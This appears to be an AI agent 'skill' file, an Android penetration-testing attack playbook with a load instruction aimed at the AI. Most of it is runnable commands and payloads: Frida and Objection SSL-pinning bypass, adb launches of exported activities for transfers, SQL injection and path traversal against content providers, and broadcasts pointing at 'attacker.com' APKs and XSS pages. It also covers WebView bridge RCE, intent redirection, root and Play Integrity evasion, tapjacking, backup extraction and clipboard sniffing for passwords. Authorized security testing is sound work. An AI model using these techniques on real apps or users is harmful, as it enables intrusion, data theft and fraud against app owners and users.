SKILL: Android Pentesting Tricks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.
0. RELATED ROUTING
Before going deep, consider loading:
Advanced Reference
Also load FRIDA_SCRIPTS.md when you need:
- Ready-to-use Frida script templates for common Android testing tasks
- Detailed hook points for OkHttp, Retrofit, Volley, WebView
- Root detection bypass script collection
1. SSL PINNING BYPASS
1.1 Frida Universal Bypass
# Install Frida server on device
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"
# Universal SSL pinning bypass
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause
| Hook Point | Library/Class | Coverage |
|---|
X509TrustManager.checkServerTrusted | Android SDK | All standard HTTPS |
OkHttpClient.Builder.sslSocketFactory | OkHttp 3.x/4.x | Square OkHttp |
CertificatePinner.check | OkHttp 3.x/4.x | OkHttp pinning |
HttpsURLConnection.setSSLSocketFactory | Android SDK | Legacy HTTPS |
SSLContext.init | Android SDK | Custom SSL contexts |
WebViewClient.onReceivedSslError | WebView | WebView SSL errors |
TrustManagerFactory.getTrustManagers | Android SDK | Factory-created TMs |
1.2 Objection (Quick Method)
objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable
1.3 Network Security Config (Debug Builds)
If you can modify the APK or it's a debug build:
<!-- res/xml/network_security_config.xml -->
<network-security-config>
<debug-overrides>
<trust-anchors>
<certificates src="user" /> <!-- Trust user-installed CAs -->
</trust-anchors>
</debug-overrides>
</network-security-config>
1.4 Magisk Module Approach
| Module | Method | Scope |
|---|
| LSPosed + TrustMeAlready | Hooks system-wide TrustManager | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Moves user CA to system store | All apps trusting system CAs |
| ConscryptTrustUserCerts | Patches Conscrypt | Newer Android (7+) |
2. COMPONENT EXPOSURE
2.1 Exported Activities
# Find exported activities (AndroidManifest.xml or aapt)
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"
# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
-d "target://callback?token=attacker_token"
# With extra data
adb shell am start -n com.target.app/.TransferActivity \
--es "amount" "99999" --es "recipient" "attacker"
2.2 Content Providers
# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users
# SQL injection in content provider
adb shell content query --uri "content://com.target.app.provider/users" \
--where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"
# Path traversal in file-providing content provider
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
| Provider Type | Attack Vector | Impact |
|---|
| Database-backed | SQL injection via query() projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |
2.3 Broadcast Receivers
# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
--es "url" "http://attacker.com/malicious.apk"
# Ordered broadcast interception (higher priority receiver intercepts first)
# Register receiver with higher priority than target to intercept/modify data
2.4 Exported Services
# Start/bind to exported service
adb shell am startservice -n com.target.app/.BackgroundService \
--es "command" "exfiltrate"
# List running services
adb shell dumpsys activity services | grep com.target
3. WEBVIEW VULNERABILITIES
3.1 JavaScript Interface RCE (Pre-API 17)
// Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation
webView.addJavascriptInterface(new JSInterface(), "android");
// Pre-API 17: Reflection-based RCE via injected JavaScript
// Inject into WebView:
// android.getClass().forName('java.lang.Runtime')
// .getMethod('getRuntime').invoke(null).exec('id')
3.2 Modern WebView Attacks
| Vulnerability | Condition | Exploit |
|---|
setJavaScriptEnabled(true) + untrusted content | JS enabled + attacker controls loaded URL | XSS → bridge access |
setAllowFileAccessFromFileURLs(true) | file:// can read other file:// | Load file:///data/data/com.target/... |
setAllowUniversalAccessFromFileURLs(true) | file:// can access any origin | Exfiltrate via XHR to attacker |
loadUrl(user_controlled) | User input in loadUrl | javascript: scheme or file:// |
shouldOverrideUrlLoading bypass | Incomplete URL validation | Redirect to attacker-controlled page |
evaluateJavascript with tainted data | User data in JS execution | XSS in WebView context |
3.3 Deep Link to WebView Chain
1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions
4. INTENT REDIRECTION
Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.
// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity
# Exploit: start non-exported internal activity via redirection
adb shell am start -n com.target.app/.ExportedActivity \
--es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
| Pattern | Indicator | Risk |
|---|
getParcelableExtra → startActivity | Intent-in-Intent | Start non-exported activities |
getStringExtra("url") → startActivity(Intent.ACTION_VIEW) | URL forwarding | Open arbitrary URLs |
getStringExtra("class") → Class.forName → startActivity | Dynamic class loading | Start any activity by name |
5. ROOT DETECTION BYPASS
5.1 Common Root Detection Checks
| Check | What It Detects | Frida Bypass |
|---|
su binary exists | /system/xbin/su, /sbin/su | Hook File.exists() → return false |
| Build tags contain "test-keys" | Build.TAGS | Hook Build.TAGS → return "release-keys" |
| Magisk Manager installed | Package name check | Hook PackageManager.getPackageInfo |
| Superuser.apk present | Su management app | Hook File.exists() |
| RootBeer library | Multi-check root detection | Hook all RootBeer check methods |
| SafetyNet/Play Integrity | Server-side attestation | Requires Magisk DenyList + module |
| Abnormal system properties | ro.debuggable=1, etc. | Hook SystemProperties.get |
5.2 Magisk DenyList (Previously MagiskHide)
# Enable DenyList in Magisk Manager
# Add target app to DenyList — Magisk hides itself from that app
# Covers: su binary, Magisk Manager package, mount points, props
6. PLAY INTEGRITY / SAFETYNET BYPASS
| Level | What It Checks | Bypass Difficulty |
|---|
| Basic Integrity | Not rooted, not emulator | Easy (Magisk + DenyList) |
| Device Integrity | Bootloader locked, verified boot | Hard (requires locked bootloader) |
| Strong Integrity | Hardware-backed attestation | Very hard (hardware TEE) |
Techniques:
- Magisk with Zygisk enabled + DenyList for target app
- Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
- Shamiko module: hides root from specific apps
- Custom ROM with locked bootloader (Pixel-specific tricks)
7. TAPJACKING (OVERLAY ATTACKS)
<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
android:theme="@style/TransparentTheme"
android:excludeFromRecents="true">
</activity>
<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->
| Android Version | Protection | Bypass |
|---|
| Pre-6.0 | None | Full overlay |
| 6.0–11 | filterTouchesWhenObscured (opt-in) | Apps not using it are vulnerable |
| 12+ | Untrusted touches blocked for overlay windows | Partial overlays, timing-based |
8. BACKUP EXTRACTION
# Check if backup allowed
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)
# Extract backup
adb backup -f backup.ab -apk com.target.app
# Convert to tar
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar
# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data
9. ADDITIONAL TRICKS
9.1 Debuggable App Exploitation
# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's user — full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml
9.2 Drozer (Component Testing Framework)
# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2
# Query provider
dz> run app.provider.query content://com.target.app.provider/users
# Scan for injection
dz> run scanner.provider.injection -a com.target.app
9.3 Clipboard Sniffing
// Pre-Android 10: any app can read clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
ClipData data = cm.getPrimaryClip();
// Exfiltrate copied passwords, tokens, etc.
});
10. ANDROID PENTESTING DECISION TREE
Testing Android application
│
├── Can intercept HTTPS traffic?
│ ├── No → SSL pinning in place
│ │ ├── Frida available? → universal SSL bypass script (§1.1)
│ │ ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│ │ ├── Debug build? → Network Security Config (§1.3)
│ │ └── None above? → manual decompile + patch + repackage
│ └── Yes → proceed to traffic analysis
│
├── Exported components found?
│ ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│ ├── Content Providers → SQLi, path traversal (§2.2)
│ ├── Broadcast Receivers → crafted intent injection (§2.3)
│ └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│ ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│ ├── File access enabled? → file:// scheme abuse (§3.2)
│ └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│ └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│ ├── Client-side checks only? → Frida hook bypass (§5.1)
│ ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│ └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│ ├── allowBackup=true? → ADB backup extraction (§8)
│ ├── Debuggable? → run-as for direct data access (§9.1)
│ └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
└── Overlay possible? → tapjacking (§7)